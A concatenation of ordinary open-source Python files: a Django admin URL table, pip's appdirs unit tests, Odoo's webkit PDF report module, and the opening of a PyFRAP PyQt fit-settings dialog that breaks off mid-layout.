comments.comment_edit, name='comment_edit'), url(r'^events-autocomplete/$', events.event_autocomplete, name='event_autocomplete'), url(r'^channels/new/$', channels.channel_new, name='channel_new'), url(r'^channels/(?P<id>\d+)/$', channels.channel_edit, name='channel_edit'), url(r'^channels/remove/(?P<id>\d+)/$', channels.channel_remove, name='channel_remove'), url(r'^channels/$', channels.channels, name='channels'), url(r'^templates/env-autofill/$', templates.template_env_autofill, name='template_env_autofill'), url(r'^templates/new/$', templates.template_new, name='template_new'), url(r'^templates/(?P<id>\d+)/$', templates.template_edit, name='template_edit'), url(r'^templates/(?P<id>\d+)/migrate/$', templates.template_migrate, name='template_migrate'), url(r'^templates/remove/(?P<id>\d+)/$', templates.template_remove, name='template_remove'), url(r'^templates/$', templates.templates, name='templates'), url(r'^tags/$', tags.tags, name='tags'), url(r'^tags/data/$', tags.tags_data, name='tags_data'), url(r'^tags/(?P<id>\d+)/$', tags.tag_edit, name='tag_edit'), url(r'^tags/(?P<id>\d+)/remove/$', tags.tag_remove, name='tag_remove'), url(r'^tags/(?P<id>\d+)/merge/$', tags.tag_merge, name='tag_merge'), url(r'^tags/(?P<id>\d+)/merge/repeated/$', tags.tag_merge_repeated, name='tag_merge_repeated'), url(r'^locations/new/$', locations.location_new, name='location_new'), url(r'^locations/(?P<id>\d+)/$', locations.location_edit, name='location_edit'), url(r'^locations/remove/(?P<id>\d+)/$', locations.location_remove, name='location_remove'), url(r'^locations/tz/$', locations.location_timezone, name='location_timezone'), url(r'^locations/$', locations.locations, name='locations'), url(r'^regions/new/$', regions.region_new, name='region_new'), url(r'^regions/(?P<id>\d+)/$', regions.region_edit, name='region_edit'), url(r'^regions/remove/(?P<id>\d+)/$', regions.region_remove, name='region_remove'), url(r'^regions/$', regions.regions, name='regions'), url(r'^topics/new/$', topics.topic_new, name='topic_new'), url(r'^topics/(?P<id>\d+)/$', topics.topic_edit, name='topic_edit'), url(r'^topics/remove/(?P<id>\d+)/$', topics.topic_remove, name='topic_remove'), url(r'^topics/$', topics.topics, name='topics'), url(r'^approvals/$', approvals.approvals, name='approvals'), url(r'^approvals/reconsider/$', approvals.approval_reconsider, name='approval_reconsider'), url(r'^approvals/(?P<id>\d+)/$', approvals.approval_review, name='approval_review'), url(r'^pages/$', staticpages.staticpages, name='staticpages'), url(r'^pages/new/$', staticpages.staticpage_new, name='staticpage_new'), url(r'^pages/(?P<id>\d+)/$', staticpages.staticpage_edit, name='staticpage_edit'), url(r'^pages/remove/(?P<id>\d+)/$', staticpages.staticpage_remove, name='staticpage_remove'), url(r'^suggestions/$', suggestions.suggestions, name='suggestions'), url(r'^suggestions/(?P<id>\d+)/$', suggestions.suggestion_review, name='suggestion_review'), url(r'^vidly/$', vidly_media.vidly_media, name='vidly_media'), url(r'^vidly/timings/$', vidly_media.vidly_media_timings, name='vidly_media_timings'), url(r'^vidly/timings/data/$', vidly_media.vidly_media_timings_data, name='vidly_media_timings_data'), url(r'^vidly/webhook/$', vidly_media.vidly_media_webhook, name='vidly_media_webhook'), url(r'^vidly/status/$', vidly_media.vidly_media_status, name='vidly_media_status'), url(r'^vidly/info/$', vidly_media.vidly_media_info, name='vidly_media_info'), url(r'^vidly/resubmit/$', vidly_media.vidly_media_resubmit, name='vidly_media_resubmit'), url(r'^urltransforms/$', url_transforms.url_transforms, name='url_transforms'), url(r'^urltransforms/new/$', url_transforms.url_match_new, name='url_match_new'), url(r'^urltransforms/run/$', url_transforms.url_match_run, name='url_match_run'), url(r'^urltransforms/(?P<id>\d+)/remove/$', url_transforms.url_match_remove, name='url_match_remove'), url(r'^urltransforms/(?P<id>\d+)/add/$', url_transforms.url_transform_add, name='url_transform_add'), url(r'^urltransforms/(?P<id>\d+)/(?P<transform_id>\d+)/remove/$', url_transforms.url_transform_remove, name='url_transform_remove'), url(r'^urltransforms/(?P<id>\d+)/(?P<transform_id>\d+)/edit/$', url_transforms.url_transform_edit, name='url_transform_edit'), url(r'^cron-pings/$', cronlogger.cron_pings, name='cron_pings'), url(r'^curated-groups-autocomplete/', groups.curated_groups_autocomplete, name='curated_groups_autocomplete'), url(r'^insufficient-permissions/', permissions.insufficient_permissions, name='insufficient_permissions'), url(r'^recruitmentmessages/$', recruitmentmessages.recruitmentmessages, name='recruitmentmessages'), url(r'^recruitmentmessages/new/$', recruitmentmessages.recruitmentmessage_new, name='recruitmentmessage_new'), url(r'^recruitmentmessages/(?P<id>\d+)/$', recruitmentmessages.recruitmentmessage_edit, name='recruitmentmessage_edit'), url(r'^recruitmentmessages/(?P<id>\d+)/delete/$', recruitmentmessages.recruitmentmessage_delete, name='recruitmentmessage_delete'), url(r'^events/(?P<event_id>\d+)/chapters/$', chapters.event_chapters, name='event_chapters'), url(r'^events/(?P<event_id>\d+)/chapters/new/$', chapters.event_chapter_new, name='event_chapter_new'), url(r'^events/(?P<event_id>\d+)/chapters/(?P<id>\d+)/$', chapters.event_chapter_edit, name='event_chapter_edit'), url(r'^events/(?P<event_id>\d+)/chapters/(?P<id>\d+)/delete/$', chapters.event_chapter_delete, name='event_chapter_delete'), url(r'^uploads/$', uploads.uploads, name='uploads'), url(r'^loggedsearches/$', loggedsearches.loggedsearches, name='loggedsearches'), url(r'^loggedsearches/stats/$', loggedsearches.loggedsearches_stats, name='loggedsearches_stats'), url(r'^picturegallery/$', picturegallery.picturegallery, name='picturegallery'), url(r'^picturegallery/data/$', picturegallery.picturegallery_data, name='picturegallery_data'), url(r'^picturegallery/add/$', picturegallery.picture_add, name='picture_add'), url(r'^picturegallery/(?P<id>\d+)/$', picturegallery.picture_edit, name='picture_edit'), url(r'^picturegallery/(?P<id>\d+)/delete/$', picturegallery.picture_delete, name='picture_delete'), url(r'^picturegallery/(?P<id>\d+)/delete-all/$', picturegallery.picture_delete_all, name='picture_delete_all'), url(r'^picturegallery/(?P<id>\d+)/redirect_thumbnail/$', picturegallery.redirect_picture_thumbnail, name='redirect_picture_thumbnail'), url(r'^picturegallery/(?P<id>\d+)/event_associate/$', picturegallery.picture_event_associate, name='picture_event_associate'), url(r'^cronlogger/$', cronlogger.cronlogger_home, name='cronlogger'), url(r'^cronlogger/data/$', cronlogger.cronlogger_data, name='cronlogger_data'), url(r'^autocompeter/$', autocompeter.autocompeter_home, name='autocompeter'), url(r'^autocompeter/stats/$', autocompeter.autocompeter_stats, name='autocompeter_stats'), url(r'^autocompeter/test/$', autocompeter.autocompeter_test, name='autocompeter_test'), url(r'^tasks/tester/$', taskstester.tasks_tester, name='tasks_tester'), url(r'^errors/trigger/$', errors.error_trigger, name='error_trigger'), url(r'^related/$', related.related_content, name='related_content'), url(r'^related/testing/$', related.related_content_testing, name='related_content_testing'), )
bsd-3-clause
luzfcb/pip
tests/unit/test_appdirs.py
4
7219
import sys import pretend from pip.utils import appdirs class TestUserCacheDir: def test_user_cache_dir_win(self, monkeypatch): @pretend.call_recorder def _get_win_folder(base): return "C:\\Users\\test\\AppData\\Local" monkeypatch.setattr( appdirs, "_get_win_folder", _get_win_folder, raising=False, ) monkeypatch.setattr(appdirs, "WINDOWS", True) assert (appdirs.user_cache_dir("pip").replace("/", "\\") == "C:\\Users\\test\\AppData\\Local\\pip\\Cache") assert _get_win_folder.calls == [pretend.call("CSIDL_LOCAL_APPDATA")] def test_user_cache_dir_osx(self, monkeypatch): monkeypatch.setenv("HOME", "/home/test") monkeypatch.setattr(sys, "platform", "darwin") assert appdirs.user_cache_dir("pip") == "/home/test/Library/Caches/pip" def test_user_cache_dir_linux(self, monkeypatch): monkeypatch.delenv("XDG_CACHE_HOME") monkeypatch.setenv("HOME", "/home/test") monkeypatch.setattr(sys, "platform", "linux2") assert appdirs.user_cache_dir("pip") == "/home/test/.cache/pip" def test_user_cache_dir_linux_override(self, monkeypatch): monkeypatch.setenv("XDG_CACHE_HOME", "/home/test/.other-cache") monkeypatch.setenv("HOME", "/home/test") monkeypatch.setattr(sys, "platform", "linux2") assert appdirs.user_cache_dir("pip") == "/home/test/.other-cache/pip" class TestSiteConfigDirs: def test_site_config_dirs_win(self, monkeypatch): @pretend.call_recorder def _get_win_folder(base): return "C:\\ProgramData" monkeypatch.setattr( appdirs, "_get_win_folder", _get_win_folder, raising=False, ) monkeypatch.setattr(appdirs, "WINDOWS", True) result = [ e.replace("/", "\\") for e in appdirs.site_config_dirs("pip") ] assert result == ["C:\\ProgramData\\pip"] assert _get_win_folder.calls == [pretend.call("CSIDL_COMMON_APPDATA")] def test_site_config_dirs_osx(self, monkeypatch): monkeypatch.setenv("HOME", "/home/test") monkeypatch.setattr(sys, "platform", "darwin") assert appdirs.site_config_dirs("pip") == \ ["/Library/Application Support/pip"] def test_site_config_dirs_linux(self, monkeypatch): monkeypatch.delenv("XDG_CONFIG_DIRS") monkeypatch.setattr(sys, "platform", "linux2") assert appdirs.site_config_dirs("pip") == [ '/etc/xdg/pip', '/etc' ] def test_site_config_dirs_linux_override(self, monkeypatch): monkeypatch.setenv("XDG_CONFIG_DIRS", "/spam:/etc:/etc/xdg") monkeypatch.setattr(sys, "platform", "linux2") assert appdirs.site_config_dirs("pip") == [ '/spam/pip', '/etc/pip', '/etc/xdg/pip', '/etc' ] class TestUserDataDir: def test_user_data_dir_win_no_roaming(self, monkeypatch): @pretend.call_recorder def _get_win_folder(base): return "C:\\Users\\test\\AppData\\Local" monkeypatch.setattr( appdirs, "_get_win_folder", _get_win_folder, raising=False, ) monkeypatch.setattr(appdirs, "WINDOWS", True) assert (appdirs.user_data_dir("pip").replace("/", "\\") == "C:\\Users\\test\\AppData\\Local\\pip") assert _get_win_folder.calls == [pretend.call("CSIDL_LOCAL_APPDATA")] def test_user_data_dir_win_yes_roaming(self, monkeypatch): @pretend.call_recorder def _get_win_folder(base): return "C:\\Users\\test\\AppData\\Roaming" monkeypatch.setattr( appdirs, "_get_win_folder", _get_win_folder, raising=False, ) monkeypatch.setattr(appdirs, "WINDOWS", True) assert ( appdirs.user_data_dir("pip", roaming=True).replace("/", "\\") == "C:\\Users\\test\\AppData\\Roaming\\pip" ) assert _get_win_folder.calls == [pretend.call("CSIDL_APPDATA")] def test_user_data_dir_osx(self, monkeypatch): monkeypatch.setenv("HOME", "/home/test") monkeypatch.setattr(sys, "platform", "darwin") assert (appdirs.user_data_dir("pip") == "/home/test/Library/Application Support/pip") def test_user_data_dir_linux(self, monkeypatch): monkeypatch.delenv("XDG_DATA_HOME") monkeypatch.setenv("HOME", "/home/test") monkeypatch.setattr(sys, "platform", "linux2") assert appdirs.user_data_dir("pip") == "/home/test/.local/share/pip" def test_user_data_dir_linux_override(self, monkeypatch): monkeypatch.setenv("XDG_DATA_HOME", "/home/test/.other-share") monkeypatch.setenv("HOME", "/home/test") monkeypatch.setattr(sys, "platform", "linux2") assert appdirs.user_data_dir("pip") == "/home/test/.other-share/pip" class TestUserConfigDir: def test_user_config_dir_win_no_roaming(self, monkeypatch): @pretend.call_recorder def _get_win_folder(base): return "C:\\Users\\test\\AppData\\Local" monkeypatch.setattr( appdirs, "_get_win_folder", _get_win_folder, raising=False, ) monkeypatch.setattr(appdirs, "WINDOWS", True) assert ( appdirs.user_config_dir("pip", roaming=False).replace("/", "\\") == "C:\\Users\\test\\AppData\\Local\\pip" ) assert _get_win_folder.calls == [pretend.call("CSIDL_LOCAL_APPDATA")] def test_user_config_dir_win_yes_roaming(self, monkeypatch): @pretend.call_recorder def _get_win_folder(base): return "C:\\Users\\test\\AppData\\Roaming" monkeypatch.setattr( appdirs, "_get_win_folder", _get_win_folder, raising=False, ) monkeypatch.setattr(appdirs, "WINDOWS", True) assert (appdirs.user_config_dir("pip").replace("/", "\\") == "C:\\Users\\test\\AppData\\Roaming\\pip") assert _get_win_folder.calls == [pretend.call("CSIDL_APPDATA")] def test_user_config_dir_osx(self, monkeypatch): monkeypatch.setenv("HOME", "/home/test") monkeypatch.setattr(sys, "platform", "darwin") assert (appdirs.user_config_dir("pip") == "/home/test/Library/Application Support/pip") def test_user_config_dir_linux(self, monkeypatch): monkeypatch.delenv("XDG_CONFIG_HOME") monkeypatch.setenv("HOME", "/home/test") monkeypatch.setattr(sys, "platform", "linux2") assert appdirs.user_config_dir("pip") == "/home/test/.config/pip" def test_user_config_dir_linux_override(self, monkeypatch): monkeypatch.setenv("XDG_CONFIG_HOME", "/home/test/.other-config") monkeypatch.setenv("HOME", "/home/test") monkeypatch.setattr(sys, "platform", "linux2") assert appdirs.user_config_dir("pip") == "/home/test/.other-config/pip"
mit
rruebner/odoo
addons/report_webkit/webkit_report.py
26
16606
# -*- coding: utf-8 -*- ############################################################################## # # Copyright (c) 2010 Camptocamp SA (http://www.camptocamp.com) # All Right Reserved # # Author : Nicolas Bessi (Camptocamp) # Contributor(s) : Florent Xicluna (Wingo SA) # # WARNING: This program as such is intended to be used by professional # programmers who take the whole responsability of assessing all potential # consequences resulting from its eventual inadequacies and bugs # End users who are looking for a ready-to-use solution with commercial # garantees and support are strongly adviced to contract a Free Software # Service Company # # This program is Free Software; you can redistribute it and/or # modify it under the terms of the GNU General Public License # as published by the Free Software Foundation; either version 2 # of the License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA # ############################################################################## import subprocess import os import sys from openerp import report import tempfile import time import logging from functools import partial from report_helper import WebKitHelper import openerp from openerp.modules.module import get_module_resource from openerp.report.report_sxw import * from openerp import tools from openerp.tools.translate import _ from openerp.osv.osv import except_osv from urllib import urlencode, quote as quote _logger = logging.getLogger(__name__) try: # We use a jinja2 sandboxed environment to render mako templates. # Note that the rendering does not cover all the mako syntax, in particular # arbitrary Python statements are not accepted, and not all expressions are # allowed: only "public" attributes (not starting with '_') of objects may # be accessed. # This is done on purpose: it prevents incidental or malicious execution of # Python code that may break the security of the server. from jinja2.sandbox import SandboxedEnvironment mako_template_env = SandboxedEnvironment( block_start_string="<%", block_end_string="%>", variable_start_string="${", variable_end_string="}", comment_start_string="<%doc>", comment_end_string="</%doc>", line_statement_prefix="%", line_comment_prefix="##", trim_blocks=True, # do not output newline after blocks autoescape=True, # XML/HTML automatic escaping ) mako_template_env.globals.update({ 'str': str, 'quote': quote, 'urlencode': urlencode, }) except ImportError: _logger.warning("jinja2 not available, templating features will not work!") def mako_template(text): """Build a Mako template. This template uses UTF-8 encoding """ return mako_template_env.from_string(text) _extender_functions = {} def webkit_report_extender(report_name): """ A decorator to define functions to extend the context used in a template rendering. report_name must be the xml id of the desired report (it is mandatory to indicate the module in that xml id). The given function will be called at the creation of the report. The following arguments will be passed to it (in this order): - pool The model pool. - cr The cursor. - uid The user id. - localcontext The context given to the template engine to render the templates for the current report. This is the context that should be modified. - context The OpenERP context. """ def fct1(fct): lst = _extender_functions.get(report_name) if not lst: lst = [] _extender_functions[report_name] = lst lst.append(fct) return fct return fct1 class WebKitParser(report_sxw): """Custom class that use webkit to render HTML reports Code partially taken from report openoffice. Thanks guys :) """ def __init__(self, name, table, rml=False, parser=rml_parse, header=True, store=False, register=True): self.localcontext = {} report_sxw.__init__(self, name, table, rml, parser, header, store, register=register) def get_lib(self, cursor, uid): """Return the lib wkhtml path""" proxy = self.pool['ir.config_parameter'] webkit_path = proxy.get_param(cursor, uid, 'webkit_path') if not webkit_path: try: defpath = os.environ.get('PATH', os.defpath).split(os.pathsep) if hasattr(sys, 'frozen'): defpath.append(os.getcwd()) if tools.config['root_path']: defpath.append(os.path.dirname(tools.config['root_path'])) webkit_path = tools.which('wkhtmltopdf', path=os.pathsep.join(defpath)) except IOError: webkit_path = None if webkit_path: return webkit_path raise except_osv( _('Wkhtmltopdf library path is not set'), _('Please install executable on your system' \ ' (sudo apt-get install wkhtmltopdf) or download it from here:' \ ' http://code.google.com/p/wkhtmltopdf/downloads/list and set the' \ ' path in the ir.config_parameter with the webkit_path key.' \ 'Minimal version is 0.9.9') ) def generate_pdf(self, comm_path, report_xml, header, footer, html_list, webkit_header=False): """Call webkit in order to generate pdf""" if not webkit_header: webkit_header = report_xml.webkit_header fd, out_filename = tempfile.mkstemp(suffix=".pdf", prefix="webkit.tmp.") file_to_del = [out_filename] if comm_path: command = [comm_path] else: command = ['wkhtmltopdf'] command.append('--quiet') # default to UTF-8 encoding. Use <meta charset="latin-1"> to override. command.extend(['--encoding', 'utf-8']) if header : with tempfile.NamedTemporaryFile(suffix=".head.html", delete=False) as head_file: head_file.write(self._sanitize_html(header.encode('utf-8'))) file_to_del.append(head_file.name) command.extend(['--header-html', head_file.name]) if footer : with tempfile.NamedTemporaryFile(suffix=".foot.html", delete=False) as foot_file: foot_file.write(self._sanitize_html(footer.encode('utf-8'))) file_to_del.append(foot_file.name) command.extend(['--footer-html', foot_file.name]) if webkit_header.margin_top : command.extend(['--margin-top', str(webkit_header.margin_top).replace(',', '.')]) if webkit_header.margin_bottom : command.extend(['--margin-bottom', str(webkit_header.margin_bottom).replace(',', '.')]) if webkit_header.margin_left : command.extend(['--margin-left', str(webkit_header.margin_left).replace(',', '.')]) if webkit_header.margin_right : command.extend(['--margin-right', str(webkit_header.margin_right).replace(',', '.')]) if webkit_header.orientation : command.extend(['--orientation', str(webkit_header.orientation).replace(',', '.')]) if webkit_header.format : command.extend(['--page-size', str(webkit_header.format).replace(',', '.')]) count = 0 for html in html_list : with tempfile.NamedTemporaryFile(suffix="%d.body.html" %count, delete=False) as html_file: count += 1 html_file.write(self._sanitize_html(html.encode('utf-8'))) file_to_del.append(html_file.name) command.append(html_file.name) command.append(out_filename) stderr_fd, stderr_path = tempfile.mkstemp(text=True) file_to_del.append(stderr_path) try: status = subprocess.call(command, stderr=stderr_fd) os.close(stderr_fd) # ensure flush before reading stderr_fd = None # avoid closing again in finally block fobj = open(stderr_path, 'r') error_message = fobj.read() fobj.close() if not error_message: error_message = _('No diagnosis message was provided') else: error_message = _('The following diagnosis message was provided:\n') + error_message if status : raise except_osv(_('Webkit error' ), _("The command 'wkhtmltopdf' failed with error code = %s. Message: %s") % (status, error_message)) with open(out_filename, 'rb') as pdf_file: pdf = pdf_file.read() os.close(fd) finally: if stderr_fd is not None: os.close(stderr_fd) for f_to_del in file_to_del: try: os.unlink(f_to_del) except (OSError, IOError), exc: _logger.error('cannot remove file %s: %s', f_to_del, exc) return pdf def translate_call(self, parser_instance, src): """Translate String.""" ir_translation = self.pool['ir.translation'] name = self.tmpl and 'addons/' + self.tmpl or None res = ir_translation._get_source(parser_instance.cr, parser_instance.uid, name, 'report', parser_instance.localcontext.get('lang', 'en_US'), src) if res == src: # no translation defined, fallback on None (backward compatibility) res = ir_translation._get_source(parser_instance.cr, parser_instance.uid, None, 'report', parser_instance.localcontext.get('lang', 'en_US'), src) if not res : return src return res # override needed to keep the attachments storing procedure def create_single_pdf(self, cursor, uid, ids, data, report_xml, context=None): """generate the PDF""" # just try to find an xml id for the report cr = cursor pool = openerp.registry(cr.dbname) found_xml_ids = pool["ir.model.data"].search(cr, uid, [["model", "=", "ir.actions.report.xml"], \ ["res_id", "=", report_xml.id]], context=context) xml_id = None if found_xml_ids: xml_id = pool["ir.model.data"].read(cr, uid, found_xml_ids[0], ["module", "name"]) xml_id = "%s.%s" % (xml_id["module"], xml_id["name"]) if context is None: context={} htmls = [] if report_xml.report_type != 'webkit': return super(WebKitParser,self).create_single_pdf(cursor, uid, ids, data, report_xml, context=context) parser_instance = self.parser(cursor, uid, self.name2, context=context) self.pool = pool objs = self.getObjects(cursor, uid, ids, context) parser_instance.set_context(objs, data, ids, report_xml.report_type) template = False if report_xml.report_file : path = get_module_resource(*report_xml.report_file.split('/')) if path and os.path.exists(path) : template = file(path).read() if not template and report_xml.report_webkit_data : template = report_xml.report_webkit_data if not template : raise except_osv(_('Error!'), _('Webkit report template not found!')) header = report_xml.webkit_header.html footer = report_xml.webkit_header.footer_html if not header and report_xml.use_global_header: raise except_osv( _('No header defined for this Webkit report!'), _('Please set a header in company settings.') ) if not report_xml.use_global_header : header = '' default_head = get_module_resource('report_webkit', 'default_header.html') with open(default_head,'r') as f: header = f.read() css = report_xml.webkit_header.css if not css : css = '' translate_call = partial(self.translate_call, parser_instance) body_mako_tpl = mako_template(template) helper = WebKitHelper(cursor, uid, report_xml.id, context) parser_instance.localcontext['helper'] = helper parser_instance.localcontext['css'] = css parser_instance.localcontext['_'] = translate_call # apply extender functions additional = {} if xml_id in _extender_functions: for fct in _extender_functions[xml_id]: fct(pool, cr, uid, parser_instance.localcontext, context) if report_xml.precise_mode: ctx = dict(parser_instance.localcontext) for obj in parser_instance.localcontext['objects']: ctx['objects'] = [obj] try : html = body_mako_tpl.render(dict(ctx)) htmls.append(html) except Exception, e: msg = u"%s" % e _logger.error(msg) raise except_osv(_('Webkit render!'), msg) else: try : html = body_mako_tpl.render(dict(parser_instance.localcontext)) htmls.append(html) except Exception, e: msg = u"%s" % e _logger.error(msg) raise except_osv(_('Webkit render!'), msg) head_mako_tpl = mako_template(header) try : head = head_mako_tpl.render(dict(parser_instance.localcontext, _debug=False)) except Exception, e: raise except_osv(_('Webkit render!'), u"%s" % e) foot = False if footer : foot_mako_tpl = mako_template(footer) try : foot = foot_mako_tpl.render(dict(parser_instance.localcontext)) except Exception, e: msg = u"%s" % e _logger.error(msg) raise except_osv(_('Webkit render!'), msg) if report_xml.webkit_debug : try : deb = head_mako_tpl.render(dict(parser_instance.localcontext, _debug=tools.ustr("\n".join(htmls)))) except Exception, e: msg = u"%s" % e _logger.error(msg) raise except_osv(_('Webkit render!'), msg) return (deb, 'html') bin = self.get_lib(cursor, uid) pdf = self.generate_pdf(bin, report_xml, head, foot, htmls) return (pdf, 'pdf') def create(self, cursor, uid, ids, data, context=None): """We override the create function in order to handle generator Code taken from report openoffice. Thanks guys :) """ pool = openerp.registry(cursor.dbname) ir_obj = pool['ir.actions.report.xml'] report_xml_ids = ir_obj.search(cursor, uid, [('report_name', '=', self.name[7:])], context=context) if report_xml_ids: report_xml = ir_obj.browse(cursor, uid, report_xml_ids[0], context=context) else: return super(WebKitParser, self).create(cursor, uid, ids, data, context) if report_xml.report_type != 'webkit': return super(WebKitParser, self).create(cursor, uid, ids, data, context) result = self.create_source_pdf(cursor, uid, ids, data, report_xml, context) if not result: return (False,False) return result def _sanitize_html(self, html): """wkhtmltopdf expects the html page to declare a doctype. """ if html and html[:9].upper() != "<!DOCTYPE": html = "<!DOCTYPE html>\n" + html return html # vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
agpl-3.0
alexblaessle/PyFRAP
pyfrp/gui/pyfrp_gui_fit_dialogs.py
2
15172
#===================================================================================================================================== #Copyright #===================================================================================================================================== #Copyright (C) 2014 Alexander Blaessle, Patrick Mueller and the Friedrich Miescher Laboratory of the Max Planck Society #This software is distributed under the terms of the GNU General Public License. #This file is part of PyFRAP. #PyFRAP is free software: you can redistribute it and/or modify #it under the terms of the GNU General Public License as published by #the Free Software Foundation, either version 3 of the License, or #(at your option) any later version. #This program is distributed in the hope that it will be useful, #but WITHOUT ANY WARRANTY; without even the implied warranty of #MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #GNU General Public License for more details. #You should have received a copy of the GNU General Public License #along with this program. If not, see <http://www.gnu.org/licenses/>. #=========================================================================================================================================================================== #Module Description #=========================================================================================================================================================================== #PyQT Dialogs for fit class #(1) #=========================================================================================================================================================================== #Importing necessary modules #=========================================================================================================================================================================== #QT from PyQt4 import QtGui, QtCore #PyFRAP GUI classes import pyfrp_gui_basics #PyFRAP modules from pyfrp.modules.pyfrp_term_module import * from pyfrp.modules import pyfrp_img_module from pyfrp.modules import pyfrp_misc_module #Numpy/Scipy import numpy as np #Misc import os #=================================================================================================================================== #Dialog for editing simulation settings #=================================================================================================================================== class fitSettingsDialog(pyfrp_gui_basics.basicSettingsDialog): def __init__(self,fit,parent): super(fitSettingsDialog,self).__init__(parent) self.fit = fit #Labels self.lblName = QtGui.QLabel("Name:", self) self.lblOptMeth = QtGui.QLabel("Optimization Method:", self) self.lblMaxFun = QtGui.QLabel("Max. Function Calls:", self) self.lblOptTol = QtGui.QLabel("Precision goal:", self) self.lblX0D = QtGui.QLabel("x0(D):", self) self.lblX0Prod = QtGui.QLabel("x0(production):", self) self.lblX0Degr = QtGui.QLabel("x0(degration):", self) self.lblBoundsD = QtGui.QLabel("<= D <=", self) self.lblBoundsProd = QtGui.QLabel("<= production <=", self) self.lblBoundsDegr = QtGui.QLabel("<= degration <=", self) self.lblKinetic = QtGui.QLabel("Kinetic Timescale:", self) self.lblSaveTrack = QtGui.QLabel("Save Track:", self) self.lblEquOn = QtGui.QLabel("Equalization:", self) self.lblFitPinned = QtGui.QLabel("Fit Pinned:", self) self.lblFitProd = QtGui.QLabel("Fit Production:", self) self.lblFitDegr = QtGui.QLabel("Fit Degradation:", self) self.lblFitCutOffT = QtGui.QLabel("Fit Cut-Off:", self) self.lblCutOffT = QtGui.QLabel("t(Cut-Off):", self) boldfont = QtGui.QFont() boldfont.setBold(True) self.lblHeadBounds = QtGui.QLabel("Bounds:", self) self.lblHeadBounds.setFont(boldfont) self.lblHeadX0 = QtGui.QLabel("Initial Guess:", self) self.lblHeadX0.setFont(boldfont) self.lblHeadGeneral = QtGui.QLabel("General:", self) self.lblHeadGeneral.setFont(boldfont) self.lblHeadROI = QtGui.QLabel("ROIs Fitted:", self) self.lblHeadROI.setFont(boldfont) self.lblHeadOptions = QtGui.QLabel("Fit Options:", self) self.lblHeadOptions.setFont(boldfont) #LineEdits self.qleName = QtGui.QLineEdit(self.fit.name) self.qleMaxFun = QtGui.QLineEdit(str(self.fit.maxfun)) self.qleOptTol = QtGui.QLineEdit(str(self.fit.optTol)) self.qleX0D = QtGui.QLineEdit(str(self.fit.x0[0])) self.qleX0Prod = QtGui.QLineEdit(str(self.fit.x0[1])) self.qleX0Degr = QtGui.QLineEdit(str(self.fit.x0[2])) self.qleLBD = QtGui.QLineEdit(str(self.fit.LBD)) self.qleLBProd = QtGui.QLineEdit(str(self.fit.LBProd)) self.qleLBDegr = QtGui.QLineEdit(str(self.fit.LBDegr)) self.qleUBD = QtGui.QLineEdit(str(self.fit.UBD)) self.qleUBProd = QtGui.QLineEdit(str(self.fit.UBProd)) self.qleUBDegr = QtGui.QLineEdit(str(self.fit.UBDegr)) self.qleKinetic = QtGui.QLineEdit(str(self.fit.kineticTimeScale)) self.qleCutOffT = QtGui.QLineEdit(str(self.fit.cutOffT)) self.doubleValid=QtGui.QDoubleValidator() self.intValid=QtGui.QIntValidator() self.qleX0D.setValidator(self.doubleValid) self.qleX0Prod.setValidator(self.doubleValid) self.qleX0Degr.setValidator(self.doubleValid) self.qleKinetic.setValidator(self.intValid) self.qleCutOffT.setValidator(self.doubleValid) self.qleName.editingFinished.connect(self.setName) self.qleMaxFun.editingFinished.connect(self.setMaxfun) self.qleOptTol.editingFinished.connect(self.setOptTol) self.qleKinetic.editingFinished.connect(self.setKineticTimeScale) self.qleLBProd.editingFinished.connect(self.setLBProd) self.qleLBDegr.editingFinished.connect(self.setLBDegr) self.qleLBD.editingFinished.connect(self.setLBD) self.qleUBProd.editingFinished.connect(self.setUBProd) self.qleUBDegr.editingFinished.connect(self.setUBDegr) self.qleUBD.editingFinished.connect(self.setUBD) self.qleX0Prod.editingFinished.connect(self.setX0Prod) self.qleX0Degr.editingFinished.connect(self.setX0Degr) self.qleX0D.editingFinished.connect(self.setX0D) self.qleCutOffT.editingFinished.connect(self.setCutOffT) #ComboBox self.comboMeth = QtGui.QComboBox(self) self.comboMeth.addItem("Constrained Nelder-Mead") self.comboMeth.addItem("TNC") self.comboMeth.addItem("Nelder-Mead") self.comboMeth.addItem("L-BFGS-B") self.comboMeth.addItem("SLSQP") self.comboMeth.addItem("brute") self.comboMeth.addItem("BFGS") self.comboMeth.addItem("CG") self.initComboMeth() self.comboMeth.activated[str].connect(self.setOptMeth) #Checkboxes self.cbFitProd = QtGui.QCheckBox('', self) self.cbFitDegr = QtGui.QCheckBox('', self) self.cbFitPinned = QtGui.QCheckBox('', self) self.cbEquOn = QtGui.QCheckBox('', self) self.cbFitCutOffT = QtGui.QCheckBox('', self) self.cbSaveTrack = QtGui.QCheckBox('', self) self.updateCBs() self.connect(self.cbFitProd, QtCore.SIGNAL('stateChanged(int)'), self.checkFitProd) self.connect(self.cbFitDegr, QtCore.SIGNAL('stateChanged(int)'), self.checkFitDegr) self.connect(self.cbFitPinned, QtCore.SIGNAL('stateChanged(int)'), self.checkFitPinned) self.connect(self.cbFitCutOffT, QtCore.SIGNAL('stateChanged(int)'), self.checkFitCutOffT) self.connect(self.cbEquOn, QtCore.SIGNAL('stateChanged(int)'), self.checkEquOn) self.connect(self.cbSaveTrack, QtCore.SIGNAL('stateChanged(int)'), self.checkSaveTrack) #TreeWigget self.ROIList=QtGui.QTreeWidget() self.ROIList.setHeaderLabels(["Name"]) self.ROIList.setColumnWidth(0,100) self.updateROIList() #Buttons self.btnAddROI=QtGui.QPushButton('Add') self.btnDone.connect(self.btnAddROI, QtCore.SIGNAL('clicked()'), self.addROI) self.btnRemoveROI=QtGui.QPushButton('Remove') self.btnRemoveROI.connect(self.btnRemoveROI, QtCore.SIGNAL('clicked()'), self.removeROI) #Layout self.grid.addWidget(self.lblHeadGeneral,0,1,1,2,QtCore.Qt.AlignHCenter) self.grid.addWidget(self.lblName,1,1) self.grid.addWidget(self.lblOptMeth,2,1) self.grid.addWidget(self.lblMaxFun,3,1) self.grid.addWidget(self.lblOptTol,4,1) self.grid.addWidget(self.lblKinetic,5,1) self.grid.addWidget(self.lblSaveTrack,6,1) 